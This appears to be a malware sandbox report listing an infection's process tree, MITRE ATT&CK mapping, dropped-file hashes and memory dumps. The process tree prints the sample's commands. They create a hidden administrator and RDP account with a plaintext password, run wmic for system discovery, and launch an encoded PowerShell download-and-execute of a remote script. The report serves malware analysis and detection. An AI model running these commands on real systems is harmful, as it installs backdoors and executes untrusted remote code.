"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:4476

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:836

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:1900

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc rbAwK2ZR /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4480

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc rbAwK2ZR /add
2⤵
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc rbAwK2ZR /add
3⤵
PID:2120

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3660

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:4372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:1940

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
1⤵
PID:3976

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
2⤵
PID:2468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
3⤵
PID:4032

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1672

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:2764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:4552

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc rbAwK2ZR
1⤵
PID:4592

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc rbAwK2ZR
2⤵
PID:2536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc rbAwK2ZR
3⤵
PID:4472

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2772

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:4836

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1232

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:5056

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES515C.tmp
Filesize
1KB

MD5
1bf7c0ed04019c95717886f35d52b97b

SHA1
ba667d491164ceb066403a6213f565134fbea0b3

SHA256
66e87caf52b0fdfd1f971cfc5450a48f164999b0ca7c4c94db6172c2dac384e0

SHA512
6196932ac6c3ced55dd3d8a6cad5c63e9cf9fefc62787f5dc51adbc49a213d405df9d989901fa10b8cf336ba1ede1d20e1002f3b44ef4fefdd19cf579bc4d6d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xnwclm05.tuq.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
Filesize
2.5MB

MD5
a9176019ae2f0af22af200ca4f842b59

SHA1
22c13657a4210aca116ab63d2f806906dda954fd

SHA256
af452873200eda5950c1dedbfed833da08b697cea98402cd16478df89d770739

SHA512
5171e192c05a60aca06c5b4e12b69744f870a64d8c69289205f7aa082dbe1913cadd7fe4ab8d16f2d2d5eab0ebb687c68d5448b8a821c5912ec9670572d6ad3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.dll
Filesize
3KB

MD5
84a20143200a35e6cf9a70fb0a80e81a

SHA1
b5e76a5afedea22dc718383ee846f8d2cf025313

SHA256
d5ecb6c8a2cdbf275d822b3c062c3d124d2305d2c93d6d51f05aec98eac3528f

SHA512
a4206db7fa470924664f18432fcf51e5916425546aa4a3ea1d4451232c2c23c395dd13f0e730f75a6da755dcf49ae5666836a955f3b72b3e155617044d0df515

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
Filesize
1KB

MD5
28d9755addec05c0b24cca50dfe3a92b

SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3

SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9

SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

Download Submit
C:\Windows\Branding\mediasrv.png
Filesize
60KB

MD5
9453615d542c9b0d521b429b9794e07d

SHA1
6c543926f7fcb171970bcca59a4fff36873a50a3

SHA256
b59ab823d4ce1e90b39ac043ded78549b60c62b296c85b7c423d3494af220c34

SHA512
b6816d54bc1790107293f304d3252d84ecb92c6d2fd4b017537329be1fada98322766109c1306d71540cda3ef7936e3f2c0eabd894a9f2fc56183b1add292c34

Download Submit
C:\Windows\Branding\mediasvc.png
Filesize
743KB

MD5
1b1412c2f9d041ad20da79f2d5a3b130

SHA1
8ac8f1a8c75daf1f150f6bb103c1ccc510067758

SHA256
126438fadef33a97efa43b1339c5cb6e2b45dd81329381968da74909cc1aaa1f

SHA512
3dbcc808c88d8098887f7a69e182d25c17aef23f3f1e7d5fc290792bb99be5a35f62169055fddf42a7082800ddd069ddfb3f2f2742d8687bab30065dc7fb74bc

Download Submit
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7F13.tmp
Filesize
24KB

MD5
d0e162c0bd0629323ebb1ed88df890d6

SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc

SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744

SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117

Download Submit
C:\Windows\system32\rfxvmt.dll
Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nvb2al1r\CSC3B066624B2AE420C8E6B3E287BE0BE1.TMP
Filesize
652B

MD5
07a689eba7b80148f9ebba5fe514f4ad

SHA1
d0fcf197578516471304b0f26f89bd8456d4a6ac

SHA256
90e72e5e0eed8c91c768268349dad7ea3ac644e1af8b0f0ef3c705927017e79c

SHA512
71da0d39e3c4cb45b7df2318343bfb39e6a3075f4e8bbdb30ee983a7d0e936ff83dc37ba70844218470d51f4dc81eeee2addfc8031108da5bb5ec381b4072c0b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.0.cs
Filesize
424B

MD5
9f8ab7eb0ab21443a2fe06dab341510e

SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165

SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9

SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nvb2al1r\nvb2al1r.cmdline
Filesize
369B

MD5
b0f31b4da2441de66423fb6f99c55e5c

SHA1
c4fdeb713ce1e6ccfdb88aea4d6c507106acc40b

SHA256
01952217ce50ed5fda8dc599dbfb5a932d6d8a2129b4590b4c124cdbbcfde03c

SHA512
a178d79d7a6d98341f5f6f4aa9cd9f46a38952c71406c27a8c335994735741efa640bb2f7ee88e001b0280820448b2ed28ac96bf2f601d16ee444117c42036de

Download Submit
memory/2044-5-0x0000023676810000-0x0000023676820000-memory.dmp

Filesize
64KB

Download
memory/2044-1-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/2044-0-0x0000023676C30000-0x0000023677034000-memory.dmp

Filesize
4.0MB

Download
memory/2044-2-0x0000023676810000-0x0000023676820000-memory.dmp

Filesize
64KB

Download
memory/2044-3-0x0000023676810000-0x0000023676820000-memory.dmp

Filesize
64KB

Download
memory/2044-155-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/2044-4-0x0000023676810000-0x0000023676820000-memory.dmp

Filesize
64KB

Download
memory/2044-79-0x0000023676810000-0x0000023676820000-memory.dmp

Filesize
64KB

Download
memory/2044-67-0x0000023676810000-0x0000023676820000-memory.dmp

Filesize
64KB

Download
memory/2044-66-0x0000023676810000-0x0000023676820000-memory.dmp

Filesize
64KB

Download
memory/2044-65-0x0000023676810000-0x0000023676820000-memory.dmp

Filesize
64KB

Download
memory/2044-54-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/2104-38-0x00000281F7D40000-0x00000281F7EB6000-memory.dmp

Filesize
1.5MB

Download
memory/2104-34-0x00000281DF400000-0x00000281DF408000-memory.dmp

Filesize
32KB

Download
memory/2104-17-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/2104-153-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/2104-18-0x00000281DF420000-0x00000281DF442000-memory.dmp

Filesize
136KB

Download
memory/2104-100-0x00000281F7750000-0x00000281F7760000-memory.dmp

Filesize
64KB

Download
memory/2104-39-0x00000281F80D0000-0x00000281F82DA000-memory.dmp

Filesize
2.0MB

Download
memory/2104-152-0x00007FFE328A0000-0x00007FFE328B9000-memory.dmp

Filesize
100KB

Download
memory/2104-144-0x00000281F7750000-0x00000281F7760000-memory.dmp

Filesize
64KB

Download
memory/2104-113-0x00000281F7750000-0x00000281F7760000-memory.dmp

Filesize
64KB

Download
memory/2104-80-0x00007FFE328A0000-0x00007FFE328B9000-memory.dmp

Filesize
100KB

Download
memory/2104-37-0x00000281F7750000-0x00000281F7760000-memory.dmp

Filesize
64KB

Download
memory/2104-19-0x00000281F7750000-0x00000281F7760000-memory.dmp

Filesize
64KB

Download
memory/2104-20-0x00000281F7750000-0x00000281F7760000-memory.dmp

Filesize
64KB

Download
memory/2104-98-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/3168-52-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/3168-40-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/3168-41-0x000001DDC3FB0000-0x000001DDC3FC0000-memory.dmp

Filesize
64KB

Download
memory/3168-42-0x000001DDC3FB0000-0x000001DDC3FC0000-memory.dmp

Filesize
64KB

Download
memory/3920-110-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/3920-112-0x000002A1D58B0000-0x000002A1D58C0000-memory.dmp

Filesize
64KB

Download
memory/3920-111-0x000002A1D58B0000-0x000002A1D58C0000-memory.dmp

Filesize
64KB

Download
memory/3920-145-0x000002A1D58B0000-0x000002A1D58C0000-memory.dmp

Filesize
64KB

Download
memory/3920-148-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/4580-78-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/4580-77-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/4932-64-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download
memory/4932-53-0x00007FFE27BA0000-0x00007FFE28661000-memory.dmp

Filesize
10.8MB

Download